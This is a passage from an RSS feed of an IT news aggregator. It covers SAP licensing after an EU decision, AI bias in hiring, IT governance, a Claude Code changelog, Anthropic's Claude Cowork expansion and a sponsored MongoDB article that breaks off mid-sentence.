<p>For companies that have already migrated to S/4HANA or SAP Cloud ERP, this issue should largely be resolved anyway. It’s particularly relevant for those who still have the transition ahead of them. They can now review which unused licenses and maintenance contracts they can phase out and whether this is possible within the framework of SAP’s concessions, since regulations must be observed here as well. Those who are still paying substantial support fees today for products that are no longer in use can achieve significant savings by doing so.</p>



<h2 class="wp-block-heading">Take advantage of the options</h2>



<p><em>Does the EU decision improve companies’ negotiating position with SAP?</em></p>



<p><strong>Bloch:</strong> There’s no one-size-fits-all answer to that. What matters is how a company makes use of its options. In my view, the best results are generally achieved by working with SAP to find a path forward.</p>



<p><em>Why?</em></p>



<p><strong>Bloch:</strong> For example, if you completely cancel SAP support and later sign a new cloud contract, you should expect to forgo certain incentives from SAP. That’s why every decision should be made with all dependencies in mind.</p>



<p>In addition, SAP isn’t the only one offering incentives to move to the cloud. The hyperscalers also have a strong interest in attracting companies to their platforms and, in some cases, offer very attractive incentive programs. This means that companies’ starting points vary greatly.</p>



<p><em>Does this make decisions easier for CIOs?</em></p>



<p><strong>Bloch:</strong> Quite the opposite, actually. While the new situation expands the range of options, it makes strategic decision-making significantly more complex. CIOs must now ask themselves: Which existing systems continue to provide business value for our company? Added to this are questions such as: Where is it worthwhile to retain the existing landscape? And in which areas will we actually benefit from the innovations that SAP will provide in the cloud in the future? Finding exactly this balance will be the real challenge.</p>



<p><em>So does this decision primarily mean that companies gain more time, for example, to weather difficult economic periods or to better prepare for a move to the cloud?</em></p>



<p><strong>Bloch:</strong> Yes, especially for companies that haven’t yet found a compelling business case for moving to the SAP Cloud. They can continue to operate their existing landscape for the time being while simultaneously assessing whether there is still potential for cost savings by eliminating unused licenses and maintenance contracts, in other words, “shelfware.” This can certainly help in individual cases and provides more room to maneuver.</p>



<h2 class="wp-block-heading">Complexity Is Increasing</h2>



<p><em>Has the EU decision resolved the biggest problem in SAP licensing policy, or are there still issues to address?</em></p>



<p><strong>Bloch:</strong> Extended Maintenance remains an important issue for companies that have not yet migrated to S/4HANA. The EU decision also has an impact here. Companies now have significantly more options for organizing their existing system landscape and support in different ways. They no longer have to treat their entire software portfolio uniformly, but can make differentiated decisions depending on the situation.</p>



<p>However, this also increases complexity. Companies now have a whole toolbox of options and must carefully weigh which combination is right for their strategy.</p>



<p><em>What’s the next crucial step?</em></p>



<p><strong>Bloch:</strong> The key now is the practical implementation of the promised measures. Together with SAP, we need to clarify how the new regulations will be structured in detail and how companies can actually make use of them. The obligations will also be monitored by an independent trustee. I therefore hope that, together with SAP, we can provide more clarity on the operational implementation in the near future.</p>



<p><em>Does the EU decision now create additional pressure to act?</em></p>



<p><strong>Bloch:</strong> I don’t think that this will immediately increase the pressure. There’s still some time left until Extended Maintenance begins at the end of 2027. That said, companies now face an additional strategic task: they must assess which new opportunities they want to take advantage of and how these fit into their SAP strategy.</p>



<p><em>When will things get serious?</em></p>



<p><strong>Bloch:</strong> In my view, 2027 will be the decisive year. By then, many companies will need to determine which system landscape they will use to transition to Extended Maintenance and what their long-term SAP strategy should look like. Even companies that decide against moving to the SAP Cloud will gain some time as a result of the EU decision — but official support for their existing systems will end by 2030 at the latest. Especially when alternative ERP solutions are being evaluated in parallel, that’s not a particularly long planning horizon.</p>



<p><em>Your conclusion?</em></p>



<p><strong>Bloch:</strong> Overall, it’s positive that the decision has now been made. It would have been much more difficult for companies if uncertainty had persisted until early 2027. Now the framework is clear, and companies can incorporate it into their strategic decisions early on.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<p><a></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI’s potential to infect the hiring process with bias]]></title>
<description><![CDATA[You’ll be hard pressed to find an area of corporate America where AI hasn’t found a place, and that includes the tech hiring process. A survey from MyPerfectResume found that 73% of employers say they use AI in hiring decisions, while 52% use it for decisions around restructuring and role plannin...]]></description>
<link>https://tsecurity.de/de/3659261/it-nachrichten/ais-potential-to-infect-the-hiring-process-with-bias/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659261/it-nachrichten/ais-potential-to-infect-the-hiring-process-with-bias/</guid>
<pubDate>Fri, 10 Jul 2026 11:32:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>You’ll be hard pressed to find an area of corporate America where AI hasn’t found a place, and that includes the tech hiring process. A <a href="https://www.myperfectresume.com/career-center/careers/basics/ai-in-hiring-layoffs" rel="nofollow">survey from MyPerfectResume</a> found that 73% of employers say they use AI in hiring decisions, while 52% use it for decisions around restructuring and role planning.</p>



<p>On the other side, candidates are also increasingly relying on AI, with 52% of current job seekers reporting they use AI to help them in their job searches to refine submission materials (85%) and prepare for interviews (73%), according to <a href="https://www.sap.com/documents/2026/05/ccd1609f-507f-0010-bca6-c68f7e60039b.html" rel="nofollow">data from SAP</a>.</p>



<p>“Technology can help employers be more efficient, but hiring decisions still benefit from human judgment, especially when a candidate’s experience requires context that automated screening may not understand,” says Jasmine Escalera, career expert at online career and résumé builder Zety.</p>



<p>It’s clear AI is an integral part of the hiring process, and organizations need to prepare a strategy for what that looks like moving forward in terms of hiring bias, transparency, and striking the right balance of human effort and AI assistance.</p>



<h2 class="wp-block-heading">Recognizing the warning signs</h2>



<p>AI has the promise of bringing efficiency in hiring for both job seekers and employees, but if organizations aren’t careful, an overreliance on AI technology can lead to unintended consequences. Further MyPerfectResume data also reveals 65% of respondents say AI often automatically rejects applicants before a person sees them, and 14% say AI rejects more than half of applicants outright.</p>



<p>Additionally, 47% say they feel AI has filtered out candidates who would’ve otherwise advanced in the process. And 51% say they use AI to flag risky candidates, such as people who might be viewed as job-hoppers or who have employment gaps.</p>



<p>Flagging risky candidates and eliminating them before a human can look at their résumé can filter out candidates with experience that tells a more complex story than an algorithm is designed to interpret, says Escalera. Candidates re-entering the workforce after time off, for example, may have valuable skills that don’t fit neatly into automated screening criteria, she adds.</p>



<p>Similarly, there’s concern AI will reject a professional who wants to change industries, or has qualifications that don’t  perfectly reflect the language in a job description before a human has a chance to look.</p>



<p>Laurie Cure, CEO of consulting firm Innovative Connections, says she’s seen instances where AI has eliminated highly qualified yet nervous candidates who take more time than what the AI allocated to answer a question, or candidates may simply use a different language than the AI is programmed to look for, causing them to not be recommended to progress in the process.</p>



<p>She’s also seen where AI might use historical data to determine patterns of a successful employee, identifying certain schools, work histories, tenure, or other characteristics that, while not inherently bias, perpetuates the bias that accurate correlations exist between these elements, when they often don’t. Organizations need to ensure that humans remain a part of these processes, Cure adds, where they can bring context, intuition, nuance, and an ability to identify potential in a candidate that AI can’t replicate.</p>



<p>“I think we’re allowing AI to become the process instead of allowing it to support the process in ways that makes hiring better,” she says.</p>



<h2 class="wp-block-heading">An emphasis on accuracy over speed</h2>



<p>Cure says a major problem for most companies is that the balance is off, with companies using AI for the majority, if not all, of résumé screening rather than as a complement to human efforts. Organizations that simply implement AI to speed up different parts of the hiring process, without taking time to consider if a process stands to benefit from AI, run the risk of introducing bias.</p>



<p>“While this allows for managing high volumes of applicants, and provides greater degrees of consistency in applying job criteria, it likely misses many good candidates,” she says. “The human element needs to be highly active in developing job requirements so they’re not too narrow. Organizations need to look at how they ask AI to do its work, so be cautious how you frame the screening or other criteria.”</p>



<p>Ultimately, AI isn’t a tool to be implemented and forgotten, or one that should be viewed simply as a path to efficiency since many processes still benefit from and require a human touch. It’s important to conduct audits of AI processes in hiring, and to remember that the use of AI doesn’t eliminate the legal or ethical obligations an organization has for equal employment, says Cure, making the balance between human and AI even more important.</p>



<h2 class="wp-block-heading">AI transparency and fostering candidate trust</h2>



<p>AI has also introduced an element of mistrust into hiring on both sides, where employers can’t be sure candidates haven’t relied on AI the same way candidates aren’t always sure exactly how AI is being used in the hiring process. Candidates are aware that employers are implementing AI, but they’re often unsure of the extent it’s being used and when to expect to interact with humans.</p>



<p>“That lack of clarity can create skepticism and frustration, particularly in a job market that already feels highly competitive,” says Escalera. “The goal shouldn’t be to convince candidates that AI isn’t being used, but to help them understand how technology supports decisions rather than replaces the human judgment behind them.”     </p>



<p>Cure recommends organizations start with a process map that outlines every step of an organization’s hiring process to help visualize where AI is beneficial and which processes still require human intervention. Companies can shift to relying too heavily on AI or they may become too dependent on human effort, when that effort could be put toward more important tasks.</p>



<p>“Humans bring an understanding of a person’s broader history, and the ability to detect when a candidate has potential to grow into the role,” she says. “People can see non-traditional career paths and motivations more distinctly than AI. Yet AI brings consistency, efficiency, criteria standardization, and a level of objectivity the process benefits from. If we effectively blend these two at the right points in the process, hiring is enhanced, not diminished.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Gobierno de TI: el factor decisivo para que la IA no desborde a las organizaciones]]></title>
<description><![CDATA[La carrera por incorporar inteligencia artificial (IA) a los procesos empresariales está avanzando a una velocidad que muchas organizaciones tienen dificultades para controlar. La presión por innovar, automatizar y obtener ventajas competitivas está obligando a las compañías a replantearse una di...]]></description>
<link>https://tsecurity.de/de/3659047/it-nachrichten/gobierno-de-ti-el-factor-decisivo-para-que-la-ia-no-desborde-a-las-organizaciones/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659047/it-nachrichten/gobierno-de-ti-el-factor-decisivo-para-que-la-ia-no-desborde-a-las-organizaciones/</guid>
<pubDate>Fri, 10 Jul 2026 10:02:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>La carrera por incorporar inteligencia artificial (IA) a los procesos empresariales está avanzando a una velocidad que muchas organizaciones tienen dificultades para controlar. La presión por innovar, automatizar y obtener ventajas competitivas está obligando a las compañías a replantearse una disciplina que durante años ha permanecido en un segundo plano: el gobierno de TI.</p>



<p>La necesidad es cada vez más evidente. Según un estudio del IBM Institute for Business Value publicado en 2026, el 77% de las organizaciones reconoce que la adopción de la IA está avanzando más rápido que sus capacidades de gobierno.</p>



<p>Aunque el concepto de gobierno de TI es muy anterior a la irrupción de la IA, el actual escenario tecnológico ha elevado su importancia estratégica. Ya no se trata únicamente de controlar proyectos o presupuestos tecnológicos, sino de asegurar que la innovación se desarrolla bajo criterios de valor, riesgo y alineamiento empresarial.</p>



<p>“El gobierno de TI ayuda a garantizar que la organización esté tomando buenas decisiones y que esa capacidad para decidir correctamente forme parte del trabajo diario”, explica Sharon Stufflebeme, directora de soluciones para CIO en Protiviti.</p>



<h2 class="wp-block-heading">Del control tecnológico a la gobernanza empresarial</h2>



<p>Los especialistas coinciden en que el gobierno de TI ha evolucionado desde una función eminentemente operativa hacia una disciplina estrechamente vinculada al gobierno corporativo.</p>



<p>Para Bill Briggs, CTO de Deloitte Consulting y responsable ejecutivo del programa global para CIO de la firma, el gobierno de TI es el mecanismo que permite gestionar de manera consciente las inversiones tecnológicas y medir su contribución al crecimiento empresarial.</p>



<p>Y añade: “Se trata de formalizar las decisiones sobre gasto e inversiones, diferenciar entre mantener la operativa y generar crecimiento, y garantizar que lo prometido es lo que finalmente se entrega”.</p>



<p>Esa visión resulta especialmente relevante en un momento en el que los consejos de administración están demandando una mayor visibilidad sobre el retorno de las inversiones digitales, mientras aumenta la preocupación por los riesgos asociados a tecnologías emergentes como la IA generativa.</p>



<h2 class="wp-block-heading">Un reto todavía pendiente para muchas organizaciones</h2>



<p>A pesar de su relevancia, los expertos advierten de que la madurez en materia de gobierno de TI sigue siendo desigual.</p>



<p>Las grandes corporaciones, las empresas cotizadas y los sectores altamente regulados suelen disponer de estructuras formales de gobierno. Sin embargo, las organizaciones medianas y muchas compañías privadas continúan mostrando importantes carencias.</p>



<p>Incluso entre las empresas que han implantado programas de gobierno de TI, no siempre se obtienen los resultados esperados. La fragmentación tecnológica, las decisiones aisladas por áreas de negocio, la falta de comunicación y la escasa aplicación efectiva de las políticas son algunos de los problemas más frecuentes.</p>



<p>Nehawa Ngundam Abam, analista de gobierno y riesgos de TI en la aseguradora Starr y miembro del grupo de tendencias emergentes de ISACA, considera que la creciente complejidad tecnológica hace que la disciplina sea hoy más crítica que nunca.</p>



<p>“Sin un gobierno eficaz, TI puede fragmentarse fácilmente, perder alineación con los objetivos empresariales e introducir riesgos de ciberseguridad, cumplimiento normativo y reputacionales”, afirma.</p>



<h2 class="wp-block-heading">Los cinco pilares sobre los que se sustenta el gobierno de TI</h2>



<p>Aunque existen diferentes aproximaciones metodológicas, los principales marcos coinciden en cinco grandes áreas de actuación:</p>



<p>· Alineación estratégica.</p>



<p>· Entrega y generación de valor.</p>



<p>· Gestión del riesgo.</p>



<p>· Gestión de recursos.</p>



<p>· Gestión del rendimiento.</p>



<p>La prioridad de estos pilares ha cambiado con la irrupción de la IA.</p>



<p>Según Stufflebeme, la alineación estratégica y la gestión del valor se han convertido en elementos especialmente críticos. La pregunta que deben responder los CIO ya no es únicamente qué tecnología implantar, sino cómo garantizar que cada inversión contribuye a los objetivos de negocio.</p>



<p>Al mismo tiempo, la gestión del riesgo adquiere una dimensión renovada al conectar directamente con los programas corporativos de gobierno, riesgo y cumplimiento (GRC), especialmente en ámbitos como la protección de datos, la resiliencia operativa, la continuidad de negocio o el uso responsable de la IA.</p>



<h2 class="wp-block-heading">COBIT, ITIL e ISO 38500 siguen marcando el camino</h2>



<p>Para estructurar sus programas de gobierno, la mayoría de las organizaciones continúa apoyándose en marcos de referencia consolidados.</p>



<p>COBIT, desarrollado por ISACA, mantiene su posición como uno de los referentes globales para gobierno y gestión de TI, especialmente en ámbitos relacionados con el control y la gestión de riesgos.</p>



<p>Por su parte, ITIL sigue siendo una de las metodologías más extendidas para gestionar servicios tecnológicos y garantizar que los procesos de TI responden a las necesidades del negocio.</p>



<p>En el ámbito del gobierno corporativo, ISO/IEC 38500 proporciona principios para que consejos de administración y equipos directivos supervisen el uso de la tecnología desde una perspectiva estratégica.</p>



<p>Junto a ellos, modelos como CMMI o FAIR están ganando protagonismo en áreas específicas relacionadas con la madurez organizativa y la cuantificación del riesgo.</p>



<p>El verdadero desafío: integrar la gobernanza en el día a día</p>



<p>Sin embargo, los especialistas coinciden en que los marcos, por sí solos, no garantizan un buen gobierno.</p>



<p>“El problema aparece cuando las organizaciones utilizan los marcos únicamente para cumplir requisitos o marcar casillas”, advierte Stufflebeme.</p>



<p>La diferencia entre una organización madura y otra que simplemente cumple procedimientos radica en que los controles formen parte natural de la operativa diaria.</p>



<p>En este punto, la automatización y la IA pueden convertirse en aliados. Marco Bill, vicepresidente senior y CIO de Red Hat, señala que cada vez más organizaciones están incorporando controles directamente en los sistemas para facilitar el cumplimiento sin ralentizar los procesos.</p>



<p>La tendencia apunta hacia modelos de supervisión continua basados en automatización, monitorización en tiempo real y cuadros de mando que permitan detectar desviaciones antes de que se conviertan en problemas de negocio.</p>



<h2 class="wp-block-heading">La gobernanza de la IA exige un enfoque específico</h2>



<p>Uno de los debates que está ganando fuerza entre los CIO es si la IA debe gobernarse dentro de los marcos tradicionales o mediante estructuras independientes.</p>



<p>Thomas Phelps, CIO y vicepresidente senior de estrategia corporativa de Laserfiche, apuesta por una aproximación híbrida.</p>



<p>Según explica, la gobernanza de la IA debe estar integrada dentro del gobierno de TI, pero requiere una atención específica debido a la velocidad con la que evoluciona la tecnología y a los nuevos riesgos que introduce.</p>



<p>La aparición de normativas como el Reglamento Europeo de Inteligencia Artificial (AI Act) refuerza esta necesidad y obliga a las organizaciones a desarrollar mecanismos de supervisión mucho más dinámicos que los utilizados tradicionalmente en otras áreas tecnológicas.</p>



<p>Una responsabilidad que supera al departamento de TI</p>



<p>La principal conclusión de los expertos es que el gobierno de TI ha dejado de ser una responsabilidad exclusiva del CIO.</p>



<p>La creciente dependencia tecnológica de las empresas, la expansión de la inteligencia artificial y la presión regulatoria están impulsando una nueva concepción de la gobernanza, donde tecnología, negocio, riesgos, cumplimiento y dirección corporativa deben trabajar de forma conjunta.</p>



<p>Porque, como resume Briggs, el éxito llega cuando el gobierno de TI deja de percibirse como una función del departamento tecnológico y pasa a entenderse como una parte esencial del gobierno de toda la organización.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.206]]></title>
<description><![CDATA[What's changed

Added directory path suggestions to /cd, matching /add-dir behavior
Added a /doctor check that proposes trimming checked-in CLAUDE.md files by cutting content Claude could derive from the codebase
/commit-push-pr now auto-allows git push to the repo's configured push remote (remot...]]></description>
<link>https://tsecurity.de/de/3658504/downloads/v21206/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658504/downloads/v21206/</guid>
<pubDate>Fri, 10 Jul 2026 03:46:40 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Added directory path suggestions to <code>/cd</code>, matching <code>/add-dir</code> behavior</li>
<li>Added a <code>/doctor</code> check that proposes trimming checked-in <code>CLAUDE.md</code> files by cutting content Claude could derive from the codebase</li>
<li><code>/commit-push-pr</code> now auto-allows <code>git push</code> to the repo's configured push remote (<code>remote.pushDefault</code>, or the sole remote when only one is configured) in addition to <code>origin</code></li>
<li>Gateway: <code>/login</code> now supports Anthropic-operated public gateway endpoints</li>
<li><code>EnterWorktree</code> now asks for confirmation before entering a git worktree outside the project's <code>.claude/worktrees/</code> directory</li>
<li>Background agents now upgrade to a new version in the background right after a Claude Code update, instead of paying a slow stale-session upgrade when you attach</li>
<li>Fixed an expired login failing every model with a misleading "There's an issue with the selected model" error instead of prompting to run <code>/login</code></li>
<li>Fixed <code>claude --resume</code> and <code>--continue</code> not responding to keyboard input on startup</li>
<li>Fixed MCP servers configured via <code>--mcp-config</code> or <code>.mcp.json</code> ignoring a per-server <code>request_timeout_ms</code>, which caused long-running MCP tool calls to time out at the 60s default in fresh sessions</li>
<li>Fixed <code>CLAUDE_CODE_EXTRA_BODY</code> being silently ignored by <code>claude agents</code> / <code>--bg</code> background workers; the shell-exported override now follows the dispatching session</li>
<li>Fixed OAuth MCP servers requiring manual re-authentication after a single failed token refresh</li>
<li>Fixed <code>--permission-prompt-tool</code> pointing at an MCP server crashing with "MCP tool not found" on cold start before the server finishes connecting</li>
<li>Fixed <code>/model</code> picker rows printing a price for a different model than the row named, and stopped quoting first-party list prices on providers that don't bill them</li>
<li>Fixed server-provided model rows being misplaced in the <code>/model</code> picker when an entitlement or allowlist restriction drops the row they were positioned against</li>
<li>Fixed desktop sessions getting stuck showing "running" after a slash command was sent mid-turn</li>
<li>Fixed keyboard input being ignored in the agents view when a setup prompt appeared before a bare <code>claude --resume</code> on Windows</li>
<li>Fixed <code>claude rm</code> leaving the removed job in the daemon roster, causing the row to reappear in <code>claude agents</code></li>
<li>Fixed <code>/remote-control</code> showing "Unknown command" when logged out — it now explains how to sign in</li>
<li>Fixed left arrow not stepping back out of a phase or agent in the workflow detail view</li>
<li>Fixed <code>/status</code> listing the same broken-install warning twice</li>
<li>Fixed false "disused plugin" tips and skewed disuse telemetry for LSP plugins</li>
<li>Fixed <code>/doctor</code>'s update check to compare Homebrew installs against their cask's channel instead of the settings channel</li>
<li>Fixed the fullscreen jump-to-bottom pill suggesting Ctrl+End on macOS, not showing rebound chords, and wrapping over the transcript</li>
<li>Bedrock: fixed a multi-minute startup hang when using an <code>awsCredentialExport</code> helper on networks with restricted egress</li>
<li>Improved <code>/code-review</code> findings quality on claude-opus-4-8 across all effort levels</li>
<li>Improved agents view: status column now uses full terminal width instead of truncating at 64 characters</li>
<li>Changed agents view: Ctrl+X now permanently removes a completed session, and sessions no longer render twice; deleted background jobs stay deleted</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[When Your Smart Vacuum Dies]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 Many smart home devices depend on cloud services to function. When manufacturers discontinue products or shut down those services, expensive hardware can lose key features—or stop working entirely.

Open-source alternatives offer ...]]></description>
<link>https://tsecurity.de/de/3658337/it-security-video/when-your-smart-vacuum-dies/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658337/it-security-video/when-your-smart-vacuum-dies/</guid>
<pubDate>Fri, 10 Jul 2026 00:02:24 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/FocWU7HRrIU?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Many smart home devices depend on cloud services to function. When manufacturers discontinue products or shut down those services, expensive hardware can lose key features—or stop working entirely.<br />
<br />
Open-source alternatives offer a different model. By running locally and avoiding cloud dependencies, they give users greater control, improved privacy, and longer product lifespans. It's a reminder that convenience and ownership don't always go hand in hand.<br />
<br />
Should more smart home devices be designed to work offline by default, even if it means sacrificing some cloud-powered features?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#IoT #OpenSource #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI tool scours the web for job openings, preps your resume and cover letter]]></title>
<description><![CDATA[Searching for work sucks; AI combs the internet and sucks it all up. Combine the two and let 'er rip with this Python project]]></description>
<link>https://tsecurity.de/de/3657890/it-nachrichten/ai-tool-scours-the-web-for-job-openings-preps-your-resume-and-cover-letter/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657890/it-nachrichten/ai-tool-scours-the-web-for-job-openings-preps-your-resume-and-cover-letter/</guid>
<pubDate>Thu, 09 Jul 2026 19:47:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Searching for work sucks; AI combs the internet and sucks it all up. Combine the two and let 'er rip with this Python project]]></content:encoded>
</item>
<item>
<title><![CDATA[France Orders Meta to Pay Publishers as AI Content Fights Grow]]></title>
<description><![CDATA[France’s Competition Authority ordered Meta to resume talks with publishers over payments as news groups seek better terms for content reused in AI.]]></description>
<link>https://tsecurity.de/de/3657630/it-nachrichten/france-orders-meta-to-pay-publishers-as-ai-content-fights-grow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657630/it-nachrichten/france-orders-meta-to-pay-publishers-as-ai-content-fights-grow/</guid>
<pubDate>Thu, 09 Jul 2026 18:02:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[France’s Competition Authority ordered Meta to resume talks with publishers over payments as news groups seek better terms for content reused in AI.]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic expands Claude Cowork to web and mobile as enterprise use broadens]]></title>
<description><![CDATA[Anthropic is bringing its Claude Cowork AI agent to web and mobile platforms, a move aimed at helping enterprise users monitor and manage long-running AI-driven tasks from anywhere as organizations increasingly adopt agents for operational and knowledge work.



The rollout, according to the comp...]]></description>
<link>https://tsecurity.de/de/3654335/ai-nachrichten/anthropic-expands-claude-cowork-to-web-and-mobile-as-enterprise-use-broadens/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654335/ai-nachrichten/anthropic-expands-claude-cowork-to-web-and-mobile-as-enterprise-use-broadens/</guid>
<pubDate>Wed, 08 Jul 2026 14:48:40 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Anthropic is bringing its Claude Cowork AI agent to web and mobile platforms, a move aimed at helping enterprise users monitor and manage long-running AI-driven tasks from anywhere as organizations increasingly adopt agents for operational and knowledge work.</p>



<p>The rollout, according to the company, is based on an analysis of 1.2 million anonymized and aggregated <a href="https://www.infoworld.com/article/4116598/anthropic-expands-claude-code-beyond-developer-tasks-with-cowork.html" target="_blank">Claude Cowork</a> sessions conducted between May 11 and May 31 that showed that business process and operations accounted for the largest share of the AI agent’s usage at 33.4%, followed by content creation and copywriting at 16.4%, the company wrote in a <a href="https://claude.com/blog/%20how-people-are-using-claude-cowork" target="_blank" rel="noreferrer noopener">blog post</a>.</p>



<p>Software development represented only 8.7% of sessions, ahead of DevOps and infrastructure at 7%, along with research and intelligence at 6.4%, and data analysis and business intelligence (5.8%).</p>



<p>Cowork’s expansion, which is currently in beta, will allow users to start and manage Claude Cowork sessions directly from the Claude interface on the web and mobile, while enabling the AI agent to continue executing long-running tasks in the cloud, the company wrote in a separate <a href="https://claude.com/blog/cowork-web-mobile" target="_blank" rel="noreferrer noopener">blog post</a>.</p>



<p>That cloud functionality would allow users to check progress, respond to approval requests, and resume conversations across devices without returning to their desktop, it added.</p>



<h2 class="wp-block-heading">More employee productivity</h2>



<p>For CIOs and their enterprises, Cowork’s expansion is likely to unlock productivity gains, according to <a href="https://www.linkedin.com/in/pareekhjain/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, principal at Pareekh Consulting.</p>



<p>“Teams can monitor long-running tasks, respond to exceptions, and keep business processes moving even when away from their desks, reducing operational delays, while also improving AI adoption,” Jain said.  </p>



<p>Beyond productivity gains, the expansion could reshape how CIOs staff and manage operational support functions, according to <a href="https://www.linkedin.com/in/bhupendrachopra/" target="_blank" rel="noreferrer noopener">Bhupendra Chopra</a>, chief revenue officer at IT consulting firm Kanerika.</p>



<p>“As AI agents take on routine knowledge work such as preparing reports, processing documents, and reconciling data, employees would increasingly shift from executing those tasks to supervising AI-generated outputs, reviewing exceptions, and applying business judgment. That would allow CIOs to redeploy knowledge workers toward higher-value activities while reducing the manual effort required across operational support teams,” Chopra said.</p>



<p>For developers, Cowork’s expansion will help shorten development cycles as it makes AI-assisted software engineering more continuous instead of being tied to a desktop IDE, Jain said.  </p>



<h2 class="wp-block-heading">Background agents bring governance challenges</h2>



<p>However, analysts cautioned that the rise and enterprise adoption of Claude Cowork-like tools, which represent a growing class of AI agents that operate in the background, executing long-running tasks with periodic human oversight, would also require CIOs to strengthen governance, security, and oversight.</p>



<p>“Always-on or persistent agents expand the attack surface because they continuously access enterprise systems and data. CIOs will need stronger identity controls, least-privilege permissions, audit trails, approval workflows, policy enforcement, and continuous monitoring to ensure these agents remain secure, compliant, and accountable,” Jain said.</p>



<p>Citing research from <a href="https://www.gravitee.io/blog/88-of-companies-have-already-seen-ai-agent-security-failures">Gravitee</a> that surveyed 445 IT and security leaders across multiple industries, Chopra pointed out that 88% of the surveyed leaders said that deploying AI agents reported confirmed or suspected security incidents over the past year, while only about 14% said their agents were deployed with full security and IT approval.</p>



<p>“The deployment velocity is dramatically outpacing governance. A background agent reading email, files, and calendars while the user is offline requires very precise scoping of what it can access and what it can act on,” Chopra said.</p>



<p>“Anthropic has kept human approval in the loop for consequential actions — that’s sensible product design. But enterprises need to build the same discipline on their side before they extend broad access to any agent,” Chopra added. </p>



<p>The web and mobile experience are currently available only for Max subscribers, Anthropic said, adding that support for Pro, Team, and Enterprise plans will follow in the coming weeks.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Digital-native startups are ditching rigid databases for their agentic stacks     ]]></title>
<description><![CDATA[Presented by MongoDBThe gap between what AI models and agents can produce and what legacy infrastructure can reliably support is known as architectural drag, and it is the defining bottleneck of the agentic era. The data layer underneath an agentic system must handle variable schemas, vector embe...]]></description>
<link>https://tsecurity.de/de/3652101/it-nachrichten/digital-native-startups-are-ditching-rigid-databases-for-their-agentic-stacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652101/it-nachrichten/digital-native-startups-are-ditching-rigid-databases-for-their-agentic-stacks/</guid>
<pubDate>Tue, 07 Jul 2026 18:18:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><i>Presented by MongoDB</i></p><hr><p>The gap between what AI models and agents can produce and what legacy infrastructure can reliably support is known as architectural drag, and it is the defining bottleneck of the agentic era. </p><p>The data layer underneath an agentic system must handle variable schemas, vector embeddings, real-time retrieval, and multi-tenant scale, often simultaneously and without human intervention to manage migrations — but traditional relational databases weren't natively designed for document flexibility or AI capabilities. Fixed schemas require manual updates every time an AI agent introduces a new data shape, while separate vector databases add latency and synchronization overhead.</p><p>Three digital-native startups — Huntr, Modelence, and Tavily — solved this problem the same way: by building on MongoDB Atlas, a unified database platform with native vector search, hybrid search, and managed autoscaling. Their experiences define what an agent-native data stack looks like in production, and why using Atlas enables developers to easily build complex AI native companies.</p><h2>Modelence: Building the agent-native cloud</h2><p>Modelence is an AI app builder with an open-source framework designed specifically for agent-native development, enabling anyone to build and deploy production-ready web applications, including APIs and databases, in minutes. The company recognized early that most backend infrastructure was built for humans, not AI, and that the rigid schema management and complex migrations of traditional systems create operational drag that causes agents to fail when trying to build production-ready apps.</p><p>“Choosing MongoDB helped us keep everything in a single place, which is an important property of what we strive to do for our own users," says Aram Shatakhtsyan, co-founder and CEO of Modelence. "Live data streams, vector search, all as part of the main database. For AI agents, it’s especially important to have a single platform where everything can be done, because connecting multiple platforms together makes it more error prone.”</p><p>Modelence standardized on MongoDB Atlas because its document model aligns with how AI agents process and generate data, allowing schemas to evolve 